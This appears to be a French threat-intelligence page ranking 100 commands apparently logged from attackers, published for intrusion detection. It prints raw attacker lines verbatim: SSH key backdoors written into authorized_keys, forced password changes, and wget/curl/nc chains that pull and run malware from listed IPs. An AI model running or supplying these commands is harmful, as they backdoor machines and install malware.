TROYANOSYVIRUS
Mis a jour: février 2026

Top 100 des commandes malveillantes

Les commandes les plus executees par les attaquants apres avoir obtenu l'acces au systeme. Utile pour la detection d'intrusions et la reponse aux incidents.

9907 commandes en 24h
1.
$lockr -ia .ssh
489 IPs979x
2.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
438 IPs787x
3.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
438 IPs784x
4.
$Enter new UNIX password:
239 IPs626x
5.
$top
248 IPs376x
6.
$w
241 IPs371x
7.
$uname -a
248 IPs369x
8.
$uname
241 IPs369x
9.
$cat /proc/cpuinfo | grep name | wc -l
242 IPs368x
10.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
242 IPs363x
11.
$lscpu | grep Model
237 IPs363x
12.
$uname -m
247 IPs362x
13.
$whoami
231 IPs352x
14.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
235 IPs351x
15.
$crontab -l
237 IPs350x
16.
$cat /proc/cpuinfo | grep model | grep name | wc -l
232 IPs350x
17.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
226 IPs349x
18.
$which ls
234 IPs343x
19.
$ls -lh $(which ls)
209 IPs306x
20.
$cd /data/local/tmp 2>/dev/null || cd /tmp 2>/dev/null || cd /cache; rm -f parm7 parm5 parm6 parm; mkdir -p /data/local/tmp 2>/dev/null; (wget -q -O parm7 http://45.148.120.23/bins/parm7 2>/dev/null || busybox wget -q -O parm7 http://45.148.120.23/bins/parm7 2>/dev/null || curl -fsSL -o parm7 http://45.148.120.23/bins/parm7 2>/dev/null || nc 45.148.120.23 3338 > parm7 2>/dev/null || toybox nc 45.148.120.23 3338 > parm7 2>/dev/null || bash -c "cat < /dev/tcp/45.148.120.23/3338 > parm7" 2>/dev/null
2 IPs123x
21.
$/bin/./uname -s -v -n -r -m
35 IPs119x
22.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
93 IPs109x
23.
$uname -s -v -n -m 2 > /dev/null
46 IPs71x
24.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version
42 IPs61x
25.
$cat /proc/uptime 2 > /dev/null | cut -d. -f1
17 IPs45x
26.
$uname -m 2 > /dev/null
17 IPs24x
27.
$cd /data/local/tmp/; wget http://130.12.180.78/manji.arm7 -O manji.arm7 || busybox wget http://130.12.180.78/manji.arm7 -O manji.arm7; chmod 777 manji.arm7; ./manji.arm7 || wget http://130.12.180.78/manji.mips -O manji.mips || busybox wget http://130.12.180.78/manji.mips -O manji.mips; chmod 777 manji.mips; ./manji.mips
4 IPs19x
28.
$uname -s -v -n -r -m
10 IPs18x
29.
$if [ [ ! -d ${HOME}/.ssh ] ]
6 IPs11x
30.
$nproc
5 IPs10x
31.
$then
5 IPs10x
32.
$cd /data/local/tmp/; busybox wget http://103.236.64.121/w.sh; sh w.sh; curl http://103.236.64.121/c.sh; sh c.sh; wget http://103.236.64.121/wget.sh; sh wget.sh; curl http://103.236.64.121/wget.sh; sh wget.sh; busybox wget http://103.236.64.121/wget.sh; sh wget.sh; busybox curl http://103.236.64.121/wget.sh; sh wget.sh
4 IPs8x
33.
$echo hello
4 IPs8x
34.
$Accept-Encoding: gzip
3 IPs7x
35.
$echo "$(getprop ro.product.name 2>/dev/null) $(whoami 2>/dev/null)"
2 IPs6x
36.
$/ip cloud print
3 IPs6x
37.
$fi
3 IPs6x
38.
$pm path com.ufo.miner
2 IPs4x
39.
$Accept: application/sdp
2 IPs3x
40.
$CSeq: 42 OPTIONS
2 IPs3x
41.
$Content-Length: 0
2 IPs3x
42.
$curl2
1 IPs3x
43.
$cd /data/local/tmp/; busybox wget http://180.93.52.81/w.sh; sh w.sh; curl http://180.93.52.81/c.sh; sh c.sh; wget http://180.93.52.81/wget.sh; sh wget.sh; curl http://180.93.52.81/wget.sh; sh wget.sh; busybox wget http://180.93.52.81/wget.sh; sh wget.sh; busybox curl http://180.93.52.81/wget.sh; sh wget.sh
1 IPs3x
44.
$tcpdump -D
1 IPs3x
45.
$ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
3 IPs3x
46.
$getprop ro.build.version.sdk
1 IPs3x
47.
$cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps
1 IPs3x
48.
$echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh
1 IPs3x
49.
$Max-Forwards: 70
2 IPs3x
50.
$Call-ID: 50000
2 IPs2x
51.
$From: <sip:nm@nm>;tag=root
2 IPs2x
52.
$From: < sip:nm@nm >; tag=root
2 IPs2x
53.
$wget http://130.12.182.211:25196/download.sh; sh download.sh; curl http://130.12.182.211:25196/c.sh; sh c.sh; wget http://130.12.182.211:25196/download.sh; sh download.sh; curl http://130.12.182.211:25196/download.sh; sh download.sh; busybox wget http://130.12.182.211:25196/download.sh; sh download.sh; busybox curl http://130.12.182.211:25196/download.sh; sh download.sh
1 IPs2x
54.
$Contact: <sip:nm@nm>
2 IPs2x
55.
$uname -s -m
2 IPs2x
56.
$Contact: < sip:nm@nm >
2 IPs2x
57.
$shell
1 IPs2x
58.
$rm -f /data/local/tmp/ufo.apk
2 IPs2x
59.
$To: <sip:nm2@nm2>
2 IPs2x
60.
$ps -ef | grep '[Mm]iner'
2 IPs2x
61.
$To: < sip:nm2@nm2 >
2 IPs2x
62.
$ps | grep '[Mm]iner'
2 IPs2x
63.
$cat /proc/cpuinfo
2 IPs2x
64.
$echo Hi | cat -n
2 IPs2x
65.
$echo SHELL_TEST
1 IPs2x
66.
$Accept: */*
1 IPs2x
67.
$hostname
1 IPs2x
68.
$q
1 IPs2x
69.
$echo "123456\n2QiBcZ2MjwG5\n2QiBcZ2MjwG5\n"|passwd
1 IPs1x
70.
$echo "123456\n0gEVlHmRtl6B\n0gEVlHmRtl6B\n"|passwd
1 IPs1x
71.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "ubuntu\nfs37Yg9F\nfs37Yg9F" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCf
1 IPs1x
72.
$echo "12345678\nYGVTc3H7DH4l\nYGVTc3H7DH4l\n"|passwd
1 IPs1x
73.
$echo "12345678\nQfEK2CRWWFes\nQfEK2CRWWFes\n"|passwd
1 IPs1x
74.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "tifVcLRE\ntifVcLRE" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
75.
$echo "12341234\nREVl6E0r3etM\nREVl6E0r3etM\n"|passwd
1 IPs1x
76.
$echo "123!@#\nRwOhGa3dtXuR\nRwOhGa3dtXuR\n"|passwd
1 IPs1x
77.
$echo "123!@#\nOLkYxaWthSMM\nOLkYxaWthSMM\n"|passwd
1 IPs1x
78.
$echo "121212\nUqgx8jGRPSCl\nUqgx8jGRPSCl\n"|passwd
1 IPs1x
79.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "gisela\nfOHvHaCQ\nfOHvHaCQ" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCf
1 IPs1x
80.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "carolina\nfFwoId7V\nfFwoId7V" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQ
1 IPs1x
81.
$echo "11\nUrDYY4QhC8E1\nUrDYY4QhC8E1\n"|passwd
1 IPs1x
82.
$echo "09N1RCa1Hs31\nMMynEcRa02bM\nMMynEcRa02bM\n"|passwd
1 IPs1x
83.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "M7DpWwPZ\nM7DpWwPZ" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
84.
$echo "09N1RCa1Hs31\n1TRlExpt2twC\n1TRlExpt2twC\n"|passwd
1 IPs1x
85.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "CEFs490u\nCEFs490u" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
86.
$echo "Bmw_20!_^\ne5TccT4qgoRg\ne5TccT4qgoRg\n"|passwd
1 IPs1x
87.
$echo "Bmw_20!_^\nd7OXXBddrdXM\nd7OXXBddrdXM\n"|passwd
1 IPs1x
88.
$echo "Bmw_20!_^\ncsXzZSTCkYLJ\ncsXzZSTCkYLJ\n"|passwd
1 IPs1x
89.
$echo "Bmw_20!_^\nbJfMlOVTvgrL\nbJfMlOVTvgrL\n"|passwd
1 IPs1x
90.
$dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
1 IPs1x
91.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "9wm2m44Z\n9wm2m44Z" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
92.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "2LobOQUa\n2LobOQUa" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
93.
$echo "Bmw_20!_^\nYh4Ca8XEAi0L\nYh4Ca8XEAi0L\n"|passwd
1 IPs1x
94.
$echo "Bmw_20!_^\nU1ojHrvRqSqT\nU1ojHrvRqSqT\n"|passwd
1 IPs1x
95.
$chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-2023
1 IPs1x
96.
$echo "Bmw_20!_^\nU107ukBhQ34g\nU107ukBhQ34g\n"|passwd
1 IPs1x
97.
$echo "Bmw_20!_^\nNgwDHQ1IgdHH\nNgwDHQ1IgdHH\n"|passwd
1 IPs1x
98.
$echo "Bmw_20!_^\ndrhlHoqQyphD\ndrhlHoqQyphD\n"|passwd
1 IPs1x
99.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "13slip5Y\n13slip5Y" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
100.
$echo "Bmw_20!_^\nLUXqtFrxU6ED\nLUXqtFrxU6ED\n"|passwd
1 IPs1x

Reconnaissance

uname, whoami, cat /etc/passwd

Telechargement

wget, curl, tftp

Persistance

crontab, chmod, chattr

Mouvement lateral

ssh, scp, ping

Utilisation pour la detection

Ces commandes peuvent etre utilisees pour creer des regles de detection dans les SIEM, IDS/IPS et systemes de surveillance. Surveillez ces modeles dans vos logs pour detecter les intrusions.